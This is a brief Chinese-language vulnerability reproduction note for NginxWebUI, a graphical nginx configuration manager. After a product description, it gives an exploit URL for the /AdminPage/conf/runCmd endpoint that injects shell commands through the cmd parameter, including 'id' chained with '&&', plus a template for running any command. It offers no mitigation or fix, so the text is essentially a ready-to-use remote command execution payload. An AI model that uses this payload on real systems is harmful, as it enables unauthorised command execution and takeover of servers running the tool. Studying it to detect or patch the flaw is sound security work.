系统描述
NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行启动与重载,完成对 nginx的图形化控制闭环。
漏洞复现
访问url
url地址 + /AdminPage/conf/runCmd?cmd=id%26%26echo%20nginx
url地址 + /AdminPage/conf/runCmd?cmd=命令%26%26echo%20nginx
